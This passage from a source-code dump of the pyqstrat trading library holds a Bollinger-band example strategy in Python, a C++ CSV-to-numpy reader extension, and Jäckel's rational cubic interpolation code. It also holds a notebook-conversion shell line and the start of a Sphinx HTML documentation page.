\ndef get_price(symbol, timestamps, i, strategy_context):\n    return strategy_context.c[i]\n\ndef build_example_strategy(strategy_context):\n\n    try:\n        file_path = os.path.dirname(os.path.realpath(__file__)) + '/../notebooks/support/pepsi_15_min_prices.csv.gz' # If we are running from unit tests\n    except Exception:\n        file_path = '../notebooks/support/pepsi_15_min_prices.csv.gz'\n    \n    prices = pd.read_csv(file_path)\n    prices.date = pd.to_datetime(prices.date)\n\n    timestamps = prices.date.values\n\n    pq.ContractGroup.clear()\n    pq.Contract.clear()\n\n    contract_group = pq.ContractGroup.create('PEP')\n\n    strategy_context.c = prices.c.values # For use in the get_price function\n\n    strategy = pq.Strategy(timestamps, [contract_group], get_price, trade_lag = 1, strategy_context = strategy_context)\n    \n    strategy.add_indicator('o', prices.o.values)\n    strategy.add_indicator('h', prices.h.values)\n    strategy.add_indicator('l', prices.l.values)\n    strategy.add_indicator('c', prices.c.values)\n\n    strategy.add_indicator('sma', sma, depends_on = ['c'])\n    strategy.add_indicator('upper_band', upper_band, depends_on = ['c', 'sma'])\n    strategy.add_indicator('lower_band', lower_band, depends_on = ['c', 'sma'])\n    \n    strategy.add_signal('bb_signal', bollinger_band_signal, depends_on_indicators = ['h', 'l', 'sma', 'upper_band', 'lower_band'])\n\n    # ask pyqstrat to call our trading rule when the signal has one of the values [-2, -1, 1, 2]\n    strategy.add_rule('bb_trading_rule', bollinger_band_trading_rule, \n                      signal_name = 'bb_signal', sig_true_values = [-2, -1, 1, 2])\n\n    strategy.add_market_sim(market_simulator)\n\n    return strategy\n" }, { "alpha_fraction": 0.5379387140274048, "alphanum_fraction": 0.5503144860267639, "avg_line_length": 28.51197624206543, "blob_id": "02a908fc9b2668690bd1be488614f4396876bfad", "content_id": "cb9a409d4adf5afe08405bd54e1b803f7273e7a8", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9860, "license_type": "permissive", "max_line_length": 108, "num_lines": 334, "path": "/pyqstrat/cpp/io/read_file.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// read_file.cpp\n// py_c_test\n//\n// Created by Sal Abbasi on 9/11/22.\n//\n#define PY_SSIZE_T_CLEAN\n#define NPY_NO_DEPRECATED_API 1\n#include <Python.h>\n#include <vector>\n#include <string>\n#include <memory>\n#include <iostream>\n#include <time.h>\n#include \"structmember.h\"\n#include \"csv_reader.hpp\"\n#include \"numpy/ndarrayobject.h\"\n\n\n#include <time.h>\n#include <iomanip>\n#include <sstream>\n\n\n//strptime not implemented in windows\n#ifdef _MSC_VER\nextern \"C\" char* strptime(const char* s,\n                          const char* f,\n                          struct tm* tm) {\n    std::istringstream input(s);\n    input.imbue(std::locale(setlocale(LC_ALL, nullptr)));\n    input >> std::get_time(tm, f);\n    if (input.fail()) {\n        return nullptr;\n    }\n    return (char*)(s + input.tellg());\n}\n#endif\n\n\nusing namespace std;\n\nstatic int read_list(PyObject* list, vector<int>& vec) {\n    if (list == NULL) return 0; // Empty vector\n    Py_ssize_t n = PyList_Size(list);\n    for (int i=0; i < n; i++) {\n        PyObject* item = PyList_GetItem(list, i);\n        if (!PyLong_Check(item)) {\n            PyErr_SetString(PyExc_TypeError, \"list items must be integers.\");\n            return 0;\n        }\n        int elem = static_cast<int>(PyLong_AsLong(item));\n        vec.push_back(elem);\n    }\n    return -1;\n}\n\nstatic int read_list(PyObject* list, vector<string>& vec) {\n    if (list == NULL) return 0; // Empty vector\n    Py_ssize_t n = PyList_Size(list);\n    for (int i=0; i < n; i++) {\n        PyObject* item = PyList_GetItem(list, i);\n        if (!PyUnicode_Check(item)) {\n            PyErr_SetString(PyExc_TypeError, \"list items must be strings.\");\n            return 0;\n        }\n        PyObject* ascii = PyUnicode_AsASCIIString(item);\n        char* ret_string = PyBytes_AsString(ascii);\n        vec.push_back(std::string(ret_string));\n        Py_DECREF(ascii);\n    }\n    return -1;\n}\n\nstatic PyObject* create_np_str_array(const std::vector<std::string>& vals, size_t itemsize){\n    \n    size_t mem_size = vals.size() * itemsize;\n    \n    void * mem = PyDataMem_NEW(mem_size);\n    \n    size_t cur_index=0;\n    \n    for (const auto& val : vals){\n        for(size_t i = 0; i < itemsize; i++){\n            char ch = i < val.size() ? val[i] : 0; // fill with NULL if string too short\n            reinterpret_cast<char*>(mem)[cur_index] = ch;\n            cur_index++;\n        }\n    }\n\n    npy_intp dim = static_cast<npy_intp>(vals.size());\n    \n    PyObject* arr = PyArray_New(&PyArray_Type, 1, &dim, NPY_STRING, NULL, mem,\n                                static_cast<int>(itemsize), NPY_ARRAY_CARRAY | NPY_ARRAY_OWNDATA, NULL);\n    PyArray_ENABLEFLAGS((PyArrayObject*)arr, NPY_ARRAY_OWNDATA);\n    return arr;\n}\n
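\n// Packing illustration for the function above: with itemsize = 4, the strings\n// {\"ab\", \"wxyz\"} are laid out as the 8 bytes 'a','b',0,0,'w','x','y','z', i.e. each\n// value is right-padded with NULs to the fixed numpy 'S4' width (and truncated if longer).\n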
\ntemplate<typename T> PyObject* create_np_array(PyArray_Descr* descr, void* data) {\n    npy_intp dims[1];\n    auto vec = static_cast<vector<T>*>(data);\n    dims[0] = vec->size();\n    auto _data = new T[vec->size()];\n    ::memcpy(\n        _data,\n        vec->data(),\n        vec->size() * sizeof(T));\n    delete vec;\n\n    \n    PyObject* arr = PyArray_NewFromDescr(&PyArray_Type, descr, 1, dims, NULL, _data,\n                                         NPY_ARRAY_CARRAY | NPY_ARRAY_OWNDATA , NULL);\n    PyArray_ENABLEFLAGS((PyArrayObject*)arr, NPY_ARRAY_OWNDATA);\n\n    if (arr == NULL) {\n        PyErr_SetString(PyExc_TypeError, \"could not allocate numpy array\");\n        return NULL;\n    }\n    return arr;\n}\n\n    \nstatic PyObject* create_np_array(const std::string& dtype, void* data) {\n    \n    PyObject* _dtype = Py_BuildValue(\"s\", dtype.c_str());\n    PyArray_Descr* descr;\n    PyArray_DescrConverter(_dtype, &descr);\n    Py_XDECREF(_dtype);\n    \n    PyObject* arr = NULL;\n    if (dtype[0] == 'S') {\n        int itemsize = atoi(dtype.substr(1).c_str()); // parse as signed int so a non-positive size is caught below\n        if (itemsize <= 0) {\n            PyErr_SetString(PyExc_TypeError, \"item size must be a positive int\");\n            return NULL;\n        }\n        auto col = static_cast<vector<string>*>(data);\n        arr = create_np_str_array(*col, itemsize);\n        delete col;\n    } else if (dtype.substr(0, 3) == \"M8[\") {\n        arr = create_np_array<int64_t>(descr, data);\n    } else if (dtype == \"i1\") {\n        arr = create_np_array<int8_t>(descr, data);\n    } else if (dtype == \"i4\") {\n        arr = create_np_array<int32_t>(descr, data);\n    } else if (dtype == \"i8\") {\n        arr = create_np_array<int64_t>(descr, data);\n    } else if (dtype == \"f4\") {\n        arr = create_np_array<float>(descr, data);\n    } else if (dtype == \"f8\") {\n        arr = create_np_array<double>(descr, data);\n    } else {\n        PyErr_SetString(PyExc_TypeError, \"only f4, f8, i1, i4, i8, M8[*] and S[n] datatypes are supported\");\n    }\n    return arr;\n}\n
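\n// Dispatch illustration: the dtype strings accepted above mirror numpy's dtype codes,\n// e.g. \"f8\" -> float64, \"i4\" -> int32, \"M8[ms]\" -> datetime64[ms], \"S10\" -> fixed-width\n// 10-byte strings; anything else falls through to the TypeError in the final else branch.\n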
\nstatic PyObject*\nread_file(PyObject* self, PyObject* args, PyObject* kwargs) {\n    char* filename = NULL;\n    PyObject* _col_indices = NULL;\n    PyObject* _dtypes = NULL;\n    char* separator = (char*)\",\"; // default to comma so separator[0] below is always safe\n    int skip_rows = 1;\n    int max_rows = 0;\n    \n    const char *kwlist[] = {\n        \"filename\",\n        \"col_indices\",\n        \"dtypes\",\n        \"separator\",\n        \"skip_rows\",\n        \"max_rows\",\n        NULL};\n    \n    // 6 format units for the 6 addresses below: filename, col_indices, dtypes | separator, skip_rows, max_rows\n    if (!PyArg_ParseTupleAndKeywords(args,\n                                     kwargs,\n                                     \"sOO|sii\",\n                                     const_cast<char**>(kwlist),\n                                     &filename,\n                                     &_col_indices,\n                                     &_dtypes,\n                                     &separator,\n                                     &skip_rows,\n                                     &max_rows)) {\n        return NULL;\n    }\n    if (!PyList_Check(_col_indices)) {\n        PyErr_SetString(PyExc_RuntimeError, \"col_indices must be a list\");\n        return NULL;\n    }\n\n    if (!PyList_Check(_dtypes)) {\n        PyErr_SetString(PyExc_RuntimeError, \"dtypes must be a list\");\n        return NULL;\n    }\n    vector<string> dtypes;\n    vector<int> col_indices;\n    if (!read_list(_col_indices, col_indices)) return NULL;\n    \n    int max_col_idx = -1;\n    for (auto i: col_indices) {\n        if (i <= max_col_idx) {\n            PyErr_SetString(PyExc_RuntimeError, \"col_indices must be monotonically increasing\");\n            return NULL;\n        }\n        max_col_idx = i;\n    }\n    \n    if (!read_list(_dtypes, dtypes)) return NULL;\n    if (skip_rows < 0) {\n        PyErr_SetString(PyExc_RuntimeError, \"skip_rows must be >= 0\");\n        return NULL;\n    }\n    if (max_rows < 0) {\n        PyErr_SetString(PyExc_RuntimeError, \"max_rows must be positive (or zero to read all rows)\");\n        return NULL;\n    }\n    \n    if (col_indices.size() != dtypes.size()) {\n        PyErr_SetString(PyExc_RuntimeError, \"col_indices and dtypes must be same size\");\n        return NULL;\n    }\n    \n    // release the gil\n    PyThreadState *_save;\n    _save = PyEval_SaveThread();\n    vector<void*> data;\n    try {\n        read_csv(filename, col_indices, dtypes, separator[0], skip_rows, max_rows, data);\n    } catch (const std::exception& ex) {\n        PyEval_RestoreThread(_save);\n        PyErr_SetString(PyExc_RuntimeError, ex.what());\n        return NULL;\n    }\n    //reacquire the gil\n    PyEval_RestoreThread(_save);\n    \n    auto arrays = PyList_New(dtypes.size());\n\n    int i = 0;\n    for (auto _dtype: dtypes) {\n        PyObject* arr = create_np_array(_dtype, data[i]);\n        if (arr == NULL) {\n            Py_XDECREF(arrays);\n            return NULL;\n        }\n        PyList_SetItem(arrays, i, arr);\n        i++;\n    }\n    return arrays;\n}\n\nstatic time_t time_to_epoch ( const struct tm *ltm, int utcdiff ) {\n    const int mon_days [] =\n        {31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31};\n    long tyears, tdays, leaps, utc_hrs;\n    int i;\n\n    tyears = ltm->tm_year - 70 ; // tm->tm_year is from 1900.\n    leaps = (tyears + 2) / 4; // no need for the next two lines until year 2100.\n    //i = (ltm->tm_year - 100) / 100;\n    //leaps -= ( (i/4)*3 + i%4 );\n    tdays = 0;\n    for (i=0; i < ltm->tm_mon; i++) tdays += mon_days[i];\n\n    tdays += ltm->tm_mday-1; // days of month passed.\n    tdays = tdays + (tyears * 365) + leaps;\n\n    utc_hrs = ltm->tm_hour + utcdiff; // for your time zone.\n    return (tdays * 86400) + (utc_hrs * 3600) + (ltm->tm_min * 60) + ltm->tm_sec;\n}\n\nstatic PyObject*\nparse_datetimes(PyObject* self, PyObject* args) {\n    PyObject* datetimes = NULL;\n    if (!PyArg_ParseTuple(args, \"O!\", &PyArray_Type, &datetimes)) return NULL;\n\n    if (datetimes == NULL) return NULL;\n\n    npy_intp n = PyArray_SIZE(datetimes);\n    // heap-allocate: create_np_array takes ownership of the vector and deletes it\n    auto output = new vector<int64_t>(n);\n\n    struct tm tm;\n    for (size_t i = 0; i < static_cast<size_t>(n); ++i) {\n        PyObject *item = PySequence_GetItem(datetimes, i);\n        if (!item) {\n            delete output;\n            return NULL;\n        }\n        Py_ssize_t size;\n        const char *time_str = PyUnicode_AsUTF8AndSize(item, &size);\n        if (!time_str) {\n            Py_DECREF(item);\n            delete output;\n            return NULL;\n        }\n        ::memset(&tm, 0, sizeof(tm));\n        ::strptime(time_str, \"%Y-%m-%dT%H:%M:%S\", &tm);\n        ::time_t event_time = ::time_to_epoch(&tm, 0);\n        (*output)[i] = static_cast<int64_t>(event_time);\n        Py_DECREF(item); // PySequence_GetItem returns a new reference\n    }\n    PyObject* arr = create_np_array(\"M8[s]\", output);\n    return arr;\n}\n
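\n// Hypothetical Python-side usage of the two entry points registered in the method table\n// below (a sketch only -- the exact import path depends on how the extension is packaged):\n//\n//   from pyqstrat_io import read_file, parse_datetimes\n//   dates, closes = read_file(\"prices.csv\", col_indices=[0, 3], dtypes=[\"S19\", \"f8\"],\n//                             separator=\",\", skip_rows=1)\n//   timestamps = parse_datetimes(dates.astype(str))  # expects \"%Y-%m-%dT%H:%M:%S\" values\n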
"path": "/pyqstrat/gen_py_files.sh", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "find *.ipynb -maxdepth 1 -exec jup_mini {} \\;\n" }, { "alpha_fraction": 0.6035874485969543, "alphanum_fraction": 0.6152466535568237, "avg_line_length": 29.97222137451172, "blob_id": "fced5319c26defce7ed962d4c00ead707803dbeb", "content_id": "d560b617054b1c08bcc89bc37d46c557c4dfceaf", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1116, "license_type": "permissive", "max_line_length": 92, "num_lines": 36, "path": "/pyqstrat/cpp/lets_be_rational/importexport.h", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// This source code resides at www.jaeckel.org/LetsBeRational.7z .\n//\n// ======================================================================================\n// Copyright © 2013-2014 Peter Jäckel.\n// \n// Permission to use, copy, modify, and distribute this software is freely granted,\n// provided that this notice is preserved.\n//\n// WARRANTY DISCLAIMER\n// The Software is provided \"as is\" without warranty of any kind, either express or implied,\n// including without limitation any implied warranties of condition, uninterrupted use,\n// merchantability, fitness for a particular purpose, or non-infringement.\n// ======================================================================================\n//\n#ifndef IMPORTEXPORT_H\n#define IMPORTEXPORT_H\n\n#if defined(_WIN32) || defined(_WIN64)\n# define EXPORT __declspec(dllexport)\n# define IMPORT __declspec(dllimport)\n# else\n# define EXPORT\n# define IMPORT\n#endif\n\n#ifdef __cplusplus\n# define EXTERN_C extern \"C\"\n#else\n# define EXTERN_C\n#endif\n\n# define EXPORT_EXTERN_C EXTERN_C EXPORT\n# define IMPORT_EXTERN_C EXTERN_C IMPORT\n\n#endif // IMPORTEXPORT_H\n" }, { "alpha_fraction": 0.6943231225013733, "alphanum_fraction": 0.7056768536567688, "avg_line_length": 66.35294342041016, "blob_id": "0df2aeb999bdef9ad0a7314233381d19785e702f", "content_id": "e3eefa5f16ee74d0c5850ec3442a1705384b6581", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2295, "license_type": "permissive", "max_line_length": 246, "num_lines": 34, "path": "/pyqstrat/cpp/lets_be_rational/rationalcubic.h", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// This source code resides at www.jaeckel.org/LetsBeRational.7z .\n//\n// ======================================================================================\n// Copyright © 2013-2014 Peter Jäckel.\n// \n// Permission to use, copy, modify, and distribute this software is freely granted,\n// provided that this notice is preserved.\n//\n// WARRANTY DISCLAIMER\n// The Software is provided \"as is\" without warranty of any kind, either express or implied,\n// including without limitation any implied warranties of condition, uninterrupted use,\n// merchantability, fitness for a particular purpose, or non-infringement.\n// ======================================================================================\n//\n#ifndef RATIONAL_CUBIC_H\n#define RATIONAL_CUBIC_H\n\n// Based on\n//\n// “Shape preserving piecewise rational interpolation”, R. Delbourgo, J.A. 
\n#endif // RATIONAL_CUBIC_H\n" }, { "alpha_fraction": 0.6592581272125244, "alphanum_fraction": 0.6715723276138306, "avg_line_length": 56.90434646606445, "blob_id": "1596e452bf53e449d0669f5e56888aaf638b86cb", "content_id": "b137d7eb35068a5af6c4a298ca6d1c7db2f49417", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6664, "license_type": "permissive", "max_line_length": 246, "num_lines": 115, "path": "/pyqstrat/cpp/lets_be_rational/rationalcubic.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// This source code resides at www.jaeckel.org/LetsBeRational.7z .\n//\n// ======================================================================================\n// Copyright © 2013-2014 Peter Jäckel.\n// \n// Permission to use, copy, modify, and distribute this software is freely granted,\n// provided that this notice is preserved.\n//\n// WARRANTY DISCLAIMER\n// The Software is provided \"as is\" without warranty of any kind, either express or implied,\n// including without limitation any implied warranties of condition, uninterrupted use,\n// merchantability, fitness for a particular purpose, or non-infringement.\n// ======================================================================================\n//\n\n#include \"rationalcubic.h\"\n\n#if defined(_MSC_VER)\n#  define NOMINMAX // to suppress MSVC's definitions of min() and max()\n// These four pragmas are the equivalent to /fp:fast.\n// YOU NEED THESE FOR THE SAKE OF *ACCURACY* WHEN |x| IS LARGE, say, |x|>50.\n// This is because they effectively enable the evaluation of certain\n// expressions in 80 bit registers without loss of intermediate accuracy.\n#  pragma float_control( except, off )\n#  pragma float_control( precise, off )\n#  pragma fp_contract( on )\n#  pragma fenv_access( off )\n#endif\n\n#include <float.h>\n#include <cmath>\n#include <algorithm>\n\n// Based on\n//\n// “Shape preserving piecewise rational interpolation”, R. Delbourgo, J.A. 
Gregory - SIAM journal on scientific and statistical computing, 1985 - SIAM.\n// http://dspace.brunel.ac.uk/bitstream/2438/2200/1/TR_10_83.pdf [caveat emptor: there are some typographical errors in that draft version]\n//\n\nnamespace {\n const double minimum_rational_cubic_control_parameter_value = -(1 - sqrt(DBL_EPSILON));\n const double maximum_rational_cubic_control_parameter_value = 2 / (DBL_EPSILON * DBL_EPSILON);\n inline bool is_zero(double x){ return fabs(x) < DBL_MIN; }\n}\n\ndouble rational_cubic_interpolation(double x, double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double r) {\n const double h = (x_r - x_l);\n if (fabs(h)<=0)\n return 0.5 * (y_l + y_r);\n // r should be greater than -1. We do not use assert(r > -1) here in order to allow values such as NaN to be propagated as they should.\n const double t = (x - x_l) / h;\n if ( ! (r >= maximum_rational_cubic_control_parameter_value) ) {\n const double t = (x - x_l) / h, omt = 1 - t, t2 = t * t, omt2 = omt * omt;\n // Formula (2.4) divided by formula (2.5)\n return (y_r * t2 * t + (r * y_r - h * d_r) * t2 * omt + (r * y_l + h * d_l) * t * omt2 + y_l * omt2 * omt) / (1 + (r - 3) * t * omt);\n }\n // Linear interpolation without over-or underflow.\n return y_r * t + y_l * (1 - t);\n}\n\ndouble rational_cubic_control_parameter_to_fit_second_derivative_at_left_side(double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double second_derivative_l) {\n const double h = (x_r-x_l), numerator = 0.5*h*second_derivative_l+(d_r-d_l);\n if (is_zero(numerator))\n return 0;\n const double denominator = (y_r-y_l)/h-d_l;\n if (is_zero(denominator))\n return numerator>0 ? maximum_rational_cubic_control_parameter_value : minimum_rational_cubic_control_parameter_value;\n return numerator/denominator;\n}\n\ndouble rational_cubic_control_parameter_to_fit_second_derivative_at_right_side(double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double second_derivative_r) {\n const double h = (x_r-x_l), numerator = 0.5*h*second_derivative_r+(d_r-d_l);\n if (is_zero(numerator))\n return 0;\n const double denominator = d_r-(y_r-y_l)/h;\n if (is_zero(denominator))\n return numerator>0 ? 
maximum_rational_cubic_control_parameter_value : minimum_rational_cubic_control_parameter_value;\n return numerator/denominator;\n}\n\ndouble minimum_rational_cubic_control_parameter(double d_l, double d_r, double s, bool preferShapePreservationOverSmoothness) {\n const bool monotonic = d_l * s >= 0 && d_r * s >= 0, convex = d_l <= s && s <= d_r, concave = d_l >= s && s >= d_r;\n if (!monotonic && !convex && !concave) // If 3==r_non_shape_preserving_target, this means revert to standard cubic.\n return minimum_rational_cubic_control_parameter_value;\n const double d_r_m_d_l = d_r - d_l, d_r_m_s = d_r - s, s_m_d_l = s - d_l;\n double r1 = -DBL_MAX, r2 = r1;\n // If monotonicity on this interval is possible, set r1 to satisfy the monotonicity condition (3.8).\n if (monotonic){\n if (!is_zero(s)) // (3.8), avoiding division by zero.\n r1 = (d_r + d_l) / s; // (3.8)\n else if (preferShapePreservationOverSmoothness) // If division by zero would occur, and shape preservation is preferred, set value to enforce linear interpolation.\n r1 = maximum_rational_cubic_control_parameter_value; // This value enforces linear interpolation.\n }\n if (convex || concave) {\n if (!(is_zero(s_m_d_l) || is_zero(d_r_m_s))) // (3.18), avoiding division by zero.\n r2 = std::max(fabs(d_r_m_d_l / d_r_m_s), fabs(d_r_m_d_l / s_m_d_l));\n else if (preferShapePreservationOverSmoothness)\n r2 = maximum_rational_cubic_control_parameter_value; // This value enforces linear interpolation.\n } else if (monotonic && preferShapePreservationOverSmoothness)\n r2 = maximum_rational_cubic_control_parameter_value; // This enforces linear interpolation along segments that are inconsistent with the slopes on the boundaries, e.g., a perfectly horizontal segment that has negative slopes on either edge.\n return std::max(minimum_rational_cubic_control_parameter_value, std::max(r1, r2));\n}\n\ndouble convex_rational_cubic_control_parameter_to_fit_second_derivative_at_left_side(double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double second_derivative_l, bool preferShapePreservationOverSmoothness) {\n const double r = rational_cubic_control_parameter_to_fit_second_derivative_at_left_side(x_l, x_r, y_l, y_r, d_l, d_r, second_derivative_l);\n const double r_min = minimum_rational_cubic_control_parameter(d_l, d_r, (y_r-y_l)/(x_r-x_l), preferShapePreservationOverSmoothness);\n return std::max(r,r_min);\n}\n\ndouble convex_rational_cubic_control_parameter_to_fit_second_derivative_at_right_side(double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double second_derivative_r, bool preferShapePreservationOverSmoothness) {\n const double r = rational_cubic_control_parameter_to_fit_second_derivative_at_right_side(x_l, x_r, y_l, y_r, d_l, d_r, second_derivative_r);\n const double r_min = minimum_rational_cubic_control_parameter(d_l, d_r, (y_r-y_l)/(x_r-x_l), preferShapePreservationOverSmoothness);\n return std::max(r,r_min);\n}\n" }, { "alpha_fraction": 0.5669724941253662, "alphanum_fraction": 0.5779816508293152, "avg_line_length": 20.799999237060547, "blob_id": "6a4943dbd830d56a29349d3ff9daa4e5aff61e48", "content_id": "f905165b75d56095140f2aa1a0a51e61cfbad71b", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 545, "license_type": "permissive", "max_line_length": 53, "num_lines": 25, "path": "/pyqstrat/cpp/io/csv_reader.hpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// csv_reader.hpp\n// 
py_c_test\n//\n// Created by Sal Abbasi on 9/12/22.\n//\n\n#ifndef csv_reader_hpp\n#define csv_reader_hpp\n\n#include <vector>\n#include <string>\n\nbool read_csv(const std::string& filename,\n const std::vector<int>& col_indices,\n const std::vector<std::string>& dtypes,\n char separator,\n int skip_rows,\n int max_rows,\n std::vector<void*>& output);\n\nvoid test_csv_reader();\nvoid test_csv_reader2();\nvoid test_csv_reader_zip();\n#endif /* csv_reader_hpp */\n" }, { "alpha_fraction": 0.6046701669692993, "alphanum_fraction": 0.6133246421813965, "avg_line_length": 165.7655029296875, "blob_id": "fa72d0dcff0cbb2ad30e1ec874f13bc8ed939914", "content_id": "c96551237513f3f30bcfa7d6907b691c1f03afd6", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 110232, "license_type": "permissive", "max_line_length": 1032, "num_lines": 661, "path": "/docs/_modules/pyqstrat/interactive_plot.html", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "\n<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <title>pyqstrat.interactive_plot &#8212; pyqstrat 0.1.0 documentation</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"../../_static/pygments.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"../../_static/alabaster.css\" />\n <script data-url_root=\"../../\" id=\"documentation_options\" src=\"../../_static/documentation_options.js\"></script>\n <script src=\"../../_static/jquery.js\"></script>\n <script src=\"../../_static/underscore.js\"></script>\n <script src=\"../../_static/_sphinx_javascript_frameworks_compat.js\"></script>\n <script src=\"../../_static/doctools.js\"></script>\n <link rel=\"index\" title=\"Index\" href=\"../../genindex.html\" />\n <link rel=\"search\" title=\"Search\" href=\"../../search.html\" />\n \n <link rel=\"stylesheet\" href=\"../../_static/custom.css\" type=\"text/css\" />\n \n \n <meta name=\"viewport\" content=\"width=device-width, initial-scale=0.9, maximum-scale=0.9\" />\n\n </head><body>\n \n\n <div class=\"document\">\n <div class=\"documentwrapper\">\n <div class=\"bodywrapper\">\n \n\n <div class=\"body\" role=\"main\">\n \n <h1>Source code for pyqstrat.interactive_plot</h1><div class=\"highlight\"><pre>\n<span></span><span class=\"c1\"># $$_ Lines starting with # $$_* autogenerated by jup_mini. 
Do not modify these</span>\n<span class=\"c1\"># $$_markdown</span>\n<span class=\"c1\"># # Interactive Plot</span>\n<span class=\"c1\"># $$_end_markdown</span>\n<span class=\"c1\"># $$_markdown</span>\n<span class=\"c1\"># # Description</span>\n<span class=\"c1\"># </span>\n<span class=\"c1\"># Allows interactive plotting of multidimensional data</span>\n<span class=\"c1\"># $$_end_markdown</span>\n<span class=\"c1\"># $$_code</span>\n<span class=\"c1\"># $$_ %%checkall</span>\n<span class=\"kn\">from</span> <span class=\"nn\">__future__</span> <span class=\"kn\">import</span> <span class=\"n\">annotations</span>\n<span class=\"kn\">import</span> <span class=\"nn\">os</span>\n<span class=\"kn\">import</span> <span class=\"nn\">sys</span>\n<span class=\"kn\">import</span> <span class=\"nn\">math</span>\n<span class=\"kn\">import</span> <span class=\"nn\">colorsys</span>\n<span class=\"kn\">from</span> <span class=\"nn\">dataclasses</span> <span class=\"kn\">import</span> <span class=\"n\">dataclass</span>\n<span class=\"kn\">import</span> <span class=\"nn\">unittest</span>\n<span class=\"kn\">import</span> <span class=\"nn\">doctest</span>\n<span class=\"kn\">import</span> <span class=\"nn\">pandas</span> <span class=\"k\">as</span> <span class=\"nn\">pd</span>\n<span class=\"kn\">import</span> <span class=\"nn\">numpy</span> <span class=\"k\">as</span> <span class=\"nn\">np</span>\n<span class=\"kn\">from</span> <span class=\"nn\">IPython.display</span> <span class=\"kn\">import</span> <span class=\"n\">display</span><span class=\"p\">,</span> <span class=\"n\">clear_output</span>\n<span class=\"kn\">from</span> <span class=\"nn\">ipywidgets</span> <span class=\"kn\">import</span> <span class=\"n\">widgets</span>\n<span class=\"kn\">import</span> <span class=\"nn\">plotly</span>\n<span class=\"kn\">import</span> <span class=\"nn\">plotly.callbacks</span>\n<span class=\"kn\">import</span> <span class=\"nn\">plotly.graph_objects</span> <span class=\"k\">as</span> <span class=\"nn\">go</span>\n<span class=\"kn\">from</span> <span class=\"nn\">plotly.subplots</span> <span class=\"kn\">import</span> <span class=\"n\">make_subplots</span>\n<span class=\"kn\">from</span> <span class=\"nn\">typing</span> <span class=\"kn\">import</span> <span class=\"n\">Callable</span><span class=\"p\">,</span> <span class=\"n\">Any</span>\n<span class=\"kn\">from</span> <span class=\"nn\">collections.abc</span> <span class=\"kn\">import</span> <span class=\"n\">Sequence</span>\n<span class=\"kn\">import</span> <span class=\"nn\">traitlets</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.pq_utils</span> <span class=\"kn\">import</span> <span class=\"n\">bootstrap_ci</span><span class=\"p\">,</span> <span class=\"n\">get_child_logger</span>\n\n<span class=\"n\">ROOT_DIR</span> <span class=\"o\">=</span> <span class=\"n\">os</span><span class=\"o\">.</span><span class=\"n\">path</span><span class=\"o\">.</span><span class=\"n\">join</span><span class=\"p\">(</span><span class=\"n\">sys</span><span class=\"o\">.</span><span class=\"n\">path</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">])</span>\n<span class=\"n\">sys</span><span class=\"o\">.</span><span class=\"n\">path</span><span class=\"o\">.</span><span class=\"n\">insert</span><span class=\"p\">(</span><span class=\"mi\">1</span><span class=\"p\">,</span> <span class=\"n\">ROOT_DIR</span><span class=\"p\">)</span>\n\n<span class=\"n\">_logger</span> <span class=\"o\">=</span> <span 
class=\"n\">get_child_logger</span><span class=\"p\">(</span><span class=\"vm\">__name__</span><span class=\"p\">)</span>\n\n<span class=\"n\">DEFAULT_PLOTLY_COLORS</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"s1\">&#39;rgb(31, 119, 180)&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;rgb(255, 127, 14)&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;rgb(44, 160, 44)&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;rgb(214, 39, 40)&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;rgb(148, 103, 189)&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;rgb(140, 86, 75)&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;rgb(227, 119, 194)&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;rgb(127, 127, 127)&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;rgb(188, 189, 34)&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;rgb(23, 190, 207)&#39;</span><span class=\"p\">]</span>\n\n<span class=\"n\">LineDataType</span> <span class=\"o\">=</span> <span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"n\">Any</span><span class=\"p\">,</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span 